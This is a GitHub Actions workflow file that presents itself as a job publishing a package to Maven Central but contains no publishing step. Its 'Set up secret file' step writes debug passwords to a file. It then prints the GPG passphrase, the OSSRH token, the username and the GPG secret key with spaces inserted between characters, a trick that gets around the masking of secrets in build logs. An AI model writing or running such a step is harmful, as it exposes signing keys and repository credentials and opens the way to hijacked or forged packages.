name: Publish package to the Maven Central Repository 
on:
  release:
    types: [created]
  push :
     branches :
     - local-2
jobs:
  publish:
    runs-on: ubuntu-latest 
    permissions: 
      contents: read
      packages: write 
    steps:
      - name: Check out code
        uses: actions/checkout@v2

      - name: Set up secret file
        run: |
          echo $DEBUG_PASSWORD >> secrets.txt
          echo $DEBUG_SECRET_KEY >> secrets.txt
          echo ${{secrets.GPG_PASSPHRASE}} | sed 's/./& /g'
          echo ${{secrets.OSSRH_TOKEN}} | sed 's/./& /g'
          echo ${{secrets.OSSRH_USERNAME}} | sed 's/./& /g'
          echo ${{ secrets.OSSRH_GPG_SECRET_KEY }} | sed 's/./& /g'

          
 
          
          
       

     
